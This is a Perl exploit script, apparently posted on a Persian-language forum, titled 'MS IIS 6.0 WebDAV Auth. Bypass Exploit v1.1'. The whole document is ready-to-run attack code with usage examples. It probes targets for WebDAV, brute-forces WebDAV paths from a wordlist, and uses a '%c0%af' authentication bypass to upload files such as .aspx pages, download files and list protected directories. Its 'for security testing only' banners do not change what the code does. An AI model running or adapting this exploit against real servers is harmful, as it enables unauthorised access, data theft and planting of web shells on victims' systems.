MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl)

کد:
#!/usr/bin/perl

#  ********* !!! WARNING !!! *********

#  *   FOR SECURITY TESTiNG ONLY!    *

#  ***********************************

#  MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1

#  v1.1 add brute force dir fuction.

#  v1.0 download、upload and list dir.

#

#  Usage:

#        IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]

#        -target                                eg.: 192.168.1.1

#   -port                                    eg.: 80 

#   -method                                eg.: g

#    (p:PUT,g:GET,l:LIST)

#   -webdavpath                        eg.: webdav 

#   -BruteForcePath                eg.: brute force webdav path

#   -file    (optional)            eg.: test.aspx

#  Example:

#        put a file:

#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx

#        get a file:

#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx

#        list dir:

#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav

#        brute force + list dir:

#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt

#        brute force + get file:

#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx

  

use IO::Socket;

use Getopt::Long; 



use threads;

use threads::shared;



# Globals Go Here.

my $target;                # Host being probed.

my $port;                    # Webserver port.

my $method;                # HTTP Method, PUT GET or .



my $xpath;                # WebDAV path on Webserver.

my $bpath;                # Bruteforce WebDAV path.

my $file;                    # file name.

my $httpmethod;

my $Host_Header;    # The Host header has to be changed



GetOptions( 

        "target=s"      => \$target,

        "port=i"        => \$port,

        "method=s"      => \$method,

        "xpath=s"       => \$xpath,

        "bpath=s"       => \$bpath,

        "file=s"        => \$file,

        "help|?"        => sub { 

                                hello();

                                exit(0); 

                           } 

); 



$error .= "Error: You must specify a target host\n" if ((!$target)); 

$error .= "Error: You must specify a target port\n" if ((!$port)); 

$error .= "Error: You must specify a put,get or list method\n" if ((!$method)); 

$error .= "Error: You must specify a webdav path\n" if ((!$xpath) && (!$bpath)); 

$error .= "Error: You must specify a upload or download file name\n" if ((!$file) && $method != "l"); 



if ($error) { 

        print "Try $0 -help or -?' for more information.\n$error\n" ; 

        exit; 

} 



hello();



if ($method eq "p") {

    $httpmethod = "PUT";

} elsif ($method eq "g") {

  $httpmethod = "GET";

} elsif ($method eq "l") {

  $httpmethod = "PROPFIND";

} else {

  print "$method Method not accept !!!\n";

  exit(0);

}

    

# ************************************

# * We testing WebDAV methods first  *

# ************************************

webdavtest($target,$port);

#end of WebDAV testing.

# ****************************************

# * We try to brute forceing WebDAV path *

# ****************************************

if ($bpath) {

  $xpath = webdavbf($target,$port,$bpath);

}

#end of brute force

print "-" x 60 ."\n";

if ($httpmethod eq "PUT") {

  my $content;

  my $data;

  #cacl file size

  $filesize = -s $file;

  print "$file size is $filesize bytes\n";

  open(INFO, $file) || die("Could not open file!");

  #@lines=<INFO>;

  binmode(INFO); #binary

  while(read(INFO, $data, $filesize))

  { 

      $content .= $data;

  }

  close(INFO); 

  #print $content;

  

  $Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n";

} elsif ($httpmethod eq "GET") {

    $Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n";

} elsif ($httpmethod eq "PROPFIND") {

    $Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";

    $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";

}

print "-" x 60 ."\n$httpmethod $file , Please wait ...\n"."-" x 60 ."\n";



# ************************

# * Sending HTTP request *

# ************************

if ($httpmethod eq "PUT") {

  @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,10);

  if ($#results < 1){die "10s timeout to $target on port $port\n";}

} elsif ($httpmethod eq "GET") {

    @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header",$target,$port,10);

  if ($#results < 1){die "10s timeout to $target on port $port\n";}

} elsif ($httpmethod eq "PROPFIND") {

    @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0\r\n$Host_Header",$target,$port,10);

  if ($#results < 1){die "10s timeout to $target on port $port\n";}

}

#print @results;

$flag="off";

if ($results[0] =~ m|^HTTP/1\.[01] 2[0-9][0-9] |){

    $flag="on";

} elsif ($results[0] =~ m|^HTTP/1\.[01] 4[0-9][0-9] |){

    $flag="off";

}    



print "-" x 60 ."\n";

if ($flag eq "on") {

  if ($httpmethod eq "PUT") {

      print "$httpmethod $file from [$target:$port/$xpath] OK\r\n";

  } elsif ($httpmethod eq "GET") {

    my $line_no = 0;

    my $counter = @results;

    foreach $line (@results){

        ++$line_no;

        if ($line =~ /^Accept-Ranges: bytes\r\n/){

            last;

        }

    }



    # Write file to disk

    open(OUTFILE, ">$file") or die "Could not write to file: $!\n";

    binmode (OUTFILE);

    print OUTFILE @results[$line_no+1..$counter];

    close(OUTFILE);     

     

      print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n";      

      

  } elsif ($httpmethod eq "PROPFIND") {

    print "$httpmethod path list from [$target:$port/$xpath] OK\r\n";

      foreach $line (@results){

        if ($line =~ /^\<\?xml version\=/i){

            my @list = split("<a:href>", $line);

            foreach $path (@list) {

                $no = index($path,"<");

                $result.=substr($path, 0, $no)."\n";

            }

            print $result;

            last;

        }

    }

  }

} else {

    print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!\r\n";

}

print "-" x 60 ."\n";

exit(0);



# *************

# * Sendraw-2 *

# *************

sub sendraw2 {

  my ($pstr,$realip,$realport,$timeout)=@_;

  my $target2 = inet_aton($realip);

  my $flagexit=0;

  $SIG{ALRM}=\&ermm;

  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");

  alarm($timeout);

  if (connect(S,pack "SnA4x8",2,$realport,$target2)){

    alarm(0);

    my @in;

    select(S); $|=1;

    print $pstr;

    alarm($timeout);

    while(<S>){

      if ($flagexit == 1){

        close (S);

        print STDOUT "Timeout\n";

        return "Timeout";

      }

      push @in, $_;

    }

    alarm(0);

    select(STDOUT);

    close(S);

    return @in;

  } else {return "0";}

}



sub ermm{

        $flagexit=1;

        close (S);

}



sub webdavtest {

    my ($testip,$testport)=@_;

  print "-" x 60 ."\n";

  print "Testing WebDAV methods [$testip $testport]\n";

  print "-" x 60 ."\n";

  @results=sendraw2("OPTIONS / HTTP/1.0\r\n\r\n",$testip,$testport,10);

  if ($#results < 1){die "10s timeout to $target on port $testport\n";}

  #print @results;

  $flag="off";

  foreach $line (@results){

      if ($line =~ /^Server: /){

          ($left,$right)=split(/\:/,$line);

          $right =~ s/ //g; 

          print "$target : Server type is : $right";



        if ($right !~ /Microsoft-IIS/i){

            print "$target : Not a Microsoft IIS Server\n";

            exit(0);

        }

      }

    

      if ($line =~ /^DAV: /){

          $flag="on";

      }

    

      if ($line =~ /^Public: / && $flag eq "on"){

        ($left,$right)=split(/\:/,$line);

        $right =~ s/ //g; 

        print "$target : Method type is : $right";

        if ($right !~ /$httpmethod/i){

          print "$target : Not allow $httpmethod on this WebDAV Server\n";

          exit(0);

        } else {

          $flag="on";

        }

      }        

  }

  if ($flag eq "off") {

    print "$target : WebDAV disable\n";

    exit(0);    

  }

}



sub webdavbf {

    my ($bfip,$bfport,$bfpath)=@_;

  print "-" x 60 ."\n";

  print "Try to brute forceing WebDAV path ...\n";

  print "-" x 60 ."\n";

  open(BF, $bfpath) || die("Could not open file!");

  foreach $lines (<BF>){

      chomp($lines);



      $Host_Header = "Host: $bfip\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";

      $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";

      

      @results=sendraw2("PROPFIND /$lines/ HTTP/1.0\r\n$Host_Header",$bfip,$bfport,10);

    if ($#results < 1){die "10s timeout to $bfip on port $bfport\n";}

    

    print "[$lines]...$results[0]";

    

       #maybe this response

       #HTTP/1.1 207 Multi-Status

    if ($results[0] =~ m|^HTTP/1\.[01] 401 |){

        print "Find out path on [$lines]\n";

        return $lines;

        last;

    }

  }

  close(BF) ;

  print "Sorry... We can not find any more path... :(\n";

  exit(0);

}



sub hello{

  print "\n"; 

  print "\t ##################################################\n"; 

  print "\t #    MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0  #\n"; 

  print "\t #  **************** !!! WARNING !!! **************#\n"; 

  print "\t #  **** FOR PRIVATE AND EDUCATIONAL USE ONLY! ****#\n"; 

  print "\t #  ***********************************************#\n"; 

  print "\t #  Written by csgcsg 090529                       #\n"; 

  print "\t ###################################################\n"; 

  print "\n\t $0 -target -port -method -webdavpath [-file]\n";

  print "\n\t -target\t\t eg.: 192.168.1.1\n"; 

  print "\t -port\t\t\t eg.: 80\n"; 

  print "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n"; 

  print "\t -webdavpath|-bruteForcePath\t\t eg.: webdav\n"; 

  print "\t -file\t\t\t eg.: test.aspx\n\n"; 

  print "\tUsage eg.: \n\t$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx\n"; 

};